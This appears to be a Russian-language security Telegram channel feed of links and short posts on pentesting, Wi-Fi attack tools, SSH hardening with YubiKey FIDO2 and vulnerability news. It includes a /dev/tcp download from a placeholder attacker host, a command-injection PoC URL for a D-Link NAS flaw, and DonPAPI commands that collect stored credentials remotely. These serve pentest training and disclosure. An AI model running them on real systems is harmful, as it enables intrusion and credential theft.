Fsecurity | HH

🔗Ссылка: https://habr.com/ru/companies/ru_mts/articles/856866/

Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак. LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.

>exec 3<>/dev/tcp/<kali-ip>/22

>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: <kali-ip>\r\nConnection: close\r\n\r\n" >&3

>cat <&3 > linpeas.sh

#linux #lol #upload #tips

🔗Ссылка: https://opennet.ru/62220/

Старая статья, но может кому-то интересно 👾 🔗Ссылка: https://xakep.ru/2015/08/11/metasploit-modules/

🔗Ссылка: https://teletype.in/@giscyberteam/argus_osint

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.rbc.ru/finances/07/11/2024/672b6a5b9a79472283c2bc78

Жизненный #meme

🔗Ссылка: https://opennet.ru/62221/

🔗Ссылка: https://www.securitylab.ru/news/553830.php

Что такое Airgeddon? Airgeddon — это мощный набор инструментов с открытым исходным кодом, предназначенный для проведения атак на беспроводные сети (Wi-Fi). Он фокусируется на атаках, которые используют уязвимости в безопасности Wi-Fi, с целью тестирования сетей и их защиты. Этот инструмент является одним из популярных среди специалистов по безопасности и хакеров, изучающих возможности взлома беспроводных сетей. В статье мы разберём, что такое Airgeddon, как он работает и для чего используется. 🔗Ссылка: https://kraken-academy.ru/book/%D0%A1%D1%82%D0%B0%D1%82%D1%8C%D0%B8%20%F0%9F%93%9C/airgeddon-guide/

Securing SSH with FIDO2 Небольшая заметка про прикладную задачу обеспечения дополнительного уровня контроля для доступа по SSH. Существует различные способы реализации 2FA для доступа на сервер по SSH с помощью YubiKey: ✅ PIV (Personal Identity Verification) модуль Суть заключается в том, что публичный и приватный ключ RSA/ ECC создается прямо на YubiKey, им подписывается сертификат для взаимодействия с SSH сервером через интерфейс PKCS #11 https://github.com/Yubico/yubico-piv-tool ssh -o "PKCS11Provider /usr/local/lib/libykcs11.dylib" user@remote Проверенный способ, который часто используется в компаниях, к недостаткам которого можно отнести необходимость использования дополнительного софта и ограничение на кол-во слотов на самом девайсе. ✅ OpenPGP Тут я даже не буду пытаться объяснить как работает GnuPG, а просто передам привет моему преподавателю криптографии😂 В двух словах, это самый хардкорный способ с точки зрения реализации, к преимуществам которого можно отнести возможность импорта существующих ключей и возможность распечатать бэкап на бумаге😎 https://gist.github.com/artizirk/d09ce3570021b0f65469cb450bee5e29 ✅ FIDO2 Самый удобный способ, который не требует дополнительного ПО, так как нужна только версия OpenSSH 8.2p1 и выше. В соответствии со стандартом FIDO2 ключи могут храниться на самом девайсе и отдельно: Резидентские ключи ssh-keygen -t ed25519-sk -O resident -O application=my_secure_ssh_host -O verify-required В данном случае ключ вообще никогда не покидает девайс и единственный недостаток это ограничение на кол-во слотов (на моем YubiKey 5 - 25 слотов) а также для более старыx версий прошивки, где используется CTAP (Client to Authenticator Protocol) v2.0 - это отсутствие возможности удалить только один ключ, вместо этого удалятся все 25🙈 Нерезидентские ключи ssh-keygen -t ed25519-sk Когда SSH сервер хочет аутентифицировать клиента, он отправляет Credential ID, это зашифрованная AES128 строка, которую расшифровать может только YubiKey, использованный при генерации ключа. Сам процесс происходит за счёт использования мастер-ключа уникального для каждого девайса, поэтому нерезидентские ключи не расходуют слоты и таким образом их количество неограниченно.

🔥 Критическая уязвимость в D-Link хранилках 🔥 🚨 CVE-2024-10914 — Обнаружена уязвимость в моделях D-Link DNS-320, DNS-320LW, DNS-325 и DNS-340L (версии до 28 октября 2024 года), позволяющая удалённым злоумышленникам выполнять произвольные команды. 🔴 Детали: Уязвимость связана с недостаточной проверкой параметра name в функции cgi_user_add файла /cgi-bin/account_mgr.cgi?cmd=cgi_user_add, что может привести к выполнению произвольных команд на устройстве. 💡 Рекомендации: D-Link не планирует выпускать обновления для этих моделей, так как они достигли конца жизненного цикла. Рекомендуется заменить устройства на поддерживаемые модели или, как временное решение, ограничить доступ к ним из внешних сетей. 🔗 PoC GitHub

/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27

🔗Ссылка: https://www.securitylab.ru/news/553767.php

Наш Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

С днем рождения DAMAGELAB / XSS 20 лет как никак 😎

⌨️ DonPAPI v2.1.0 DPAPI (Data Protection API) - крипто интерфейс в 💻Windows, который обеспечивает программам шифрование их сохраненных данных (пароли, cookie, токены и т.д.) Данный инструмент позволяет забрать необходимые данные удаленно, написан на 🐍 Собираемые данные:

Chromium браузеры Windows сертификаты Диспетчер УД (Credential Manager) Firefox Mobaxterm MRemoteNg RDC Manager SCCM Vaults VNC

Установка/Запуск:

pipx install donpapi

pipx run donpapi collect -u admin -p 'Password' -d domain.local -t ALL

GUI для просмотра собранных данных:

pipx run donpapi gui

http://127.0.0.1:8088

Поддерживает аутентификацию Kerberos, Pass The Hash -k --hashes --aesKey 🖥 Home 🔠 Секреты DPAPI #python #donpapi #soft #dpapi ✈️ Pentest HaT 🎩

Telegram-Android * Partisan-style. source

🔗Ссылка: https://habr.com/ru/articles/855906/